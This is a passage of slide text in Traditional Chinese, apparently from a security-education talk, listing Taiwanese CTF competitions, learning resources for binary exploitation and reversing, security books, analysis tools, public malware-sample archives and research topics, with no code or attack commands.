     180 名可進訓練名單，限我國在學生 • 臺灣好厲駭 年度個別指導計畫 – 1:1 進行指導，老師多為 chroot 組織成員與專業教授或是知名駭客，限我國在學生 • 中科院 AEGIS – 初辦題目較為通靈，近一洗前風，要求 8 小時內解完極困難有條理的題目 (尤其是 Pwn)，甚至 Misc1 也是混和整整五道常見 手法成一題的超級混和題 • 金盾盃資安競賽 – 以選擇題前測初篩，KoF 為決賽的競賽，少數非 Jeopardy 競賽，限我國在學生 • 國網 IoT 競賽 – 以上市或未上市的實體產品進行比賽測試，挑戰檢測能力與證明挖掘以及報告撰寫能力 • 國網 Red Alert 72 – 以 Defense 為主的競賽，搭配些許 Jeopardy 做基本分數 • HITCON CTF – 我國最權威資安競賽，也是世界屈指可數權威競賽，亦為世界大賽 DEFCON 之種子賽 所有線上Jeopardy，全球戰隊積分與競賽預定時程 • TrendMicro CTF – HITCON CTF 種子賽 • AIS3 EoF – AIS3 的年尾嘉年華競賽，前身 AIS3 Final 為 HITCON CTF 種子賽 • MyFirstCTF – 適合高中職生的CTF，多考古變形 • BreakAll-CTF – 適合高中職生的CTF，多考古變形

277. > • WikiPedia x86 / x86_calling_conventions / x86… • Wikibooks

     x86 Assembling • 看雪論壇文章集結本 【加密與解密】 • 【The Shellcoders Handbook】 【Hacking:The Art of Exploitation】 • CTFtime 上關於 Pwn、Reversing 的 WriteUps • Online PWN CTF – Pwn.kr 練習網站 由淺入深、Pwn.tw 經典題目收集網站、OverTheWire • Online Reversing CTF – RingZer0team/Reversing • 52pojie 工具推薦、插件推薦與精華文 • TalkSlides: – AngelBoy1(HITCON 217)、SeanWu(HITCON 217)、aaaddress1(TDoH)、 AsukNakajima(SECCON)、VinceChen(MTK)、ss8654twtw(BFKinesiS)、 frozenkp (BambooFox)

278. > & • HackerPlayBook v2 • HackerPlayBook v3 • Kali

     Linux 滲透測試工具 第二版 • 白帽子講Web安全 • The Browser Hacker’s Handbook駭客攻防聖經 • Windows Internals, System architecture, processes, threads, memory management, and more, 6/e • Windows Internals, System architecture, processes, threads, memory management, and more, 7/e

279. > Static Reversing • IDA pro • Ghidra • Snowman

     • Hopper Dynamic Debugger • Ollydbg • CheatEngine MetaData • ExifTool • Peview • Petool • Winhex • HexWorkshop • WinHex • Stud_PE UnPacker • PEiD Dynamic Logger • Elasticsearch + Moloch • MITM Proxy • TCPViewer • Nirsoft TCPLogView(有log) • Procexpa • MemMon • Vmmap • DPerfLite • IRPMon • SdtViewer

280. > • ANY.RUN: https://app.any.run/submissions • Contagio Malware Dump: http://contagiodump.blogspot.com/ •

     Das Malwerk: http://dasmalwerk.eu/ • Hybrid Analysis: https://www.hybrid-analysis.com/ • KernelMode.info: http://www.kernelmode.info/forum/viewforum.php?f=16 • MalShare: http://malshare.com/ • Malware.lu’s AVCaesar: http://avcaesar.malware.lu/ • malware-traffic-analysis.net https://www.malware-traffic-analysis.net/ • Objective-See Collection: https://objective-see.com/malware.html • PacketTotal: https://packettotal.com/malware-archive.html • SNDBOX: https://app.sndbox.com/ • theZoo: https://thezoo.morirt.com/ • VirusBay: https://beta.virusbay.io/ • VirusShare: http://virusshare.com/ • Virusign: http://www.virusign.com/ • VirusSign: https://www.virussign.com/downloads.html

281. > Books: • Security for Web Developers – John Paul

     Mueller • 加密與解密 – 段剛 • HackerPlayBook v2 • HackerPlayBook v3 • Kali Linux 滲透測試工具 第二版 • 白帽子講Web安全 • The Browser Hacker’s Handbook駭客攻防聖經 • Mastering Metasploit – Nipun Jaswal Websites: • OWASP • Mitre ATT&CK • HackTheBox • Vulnhub • XSS game • Lord-of-SQLinjection • Pwnable.kr • Sucuri

282. • Penetration Test • Anti-Virus Driver • Sandbox • Secure

     Compiler • Fuzzing Test • Symbolic Execution • Android Kernel • Linux Kernel • CAN Bus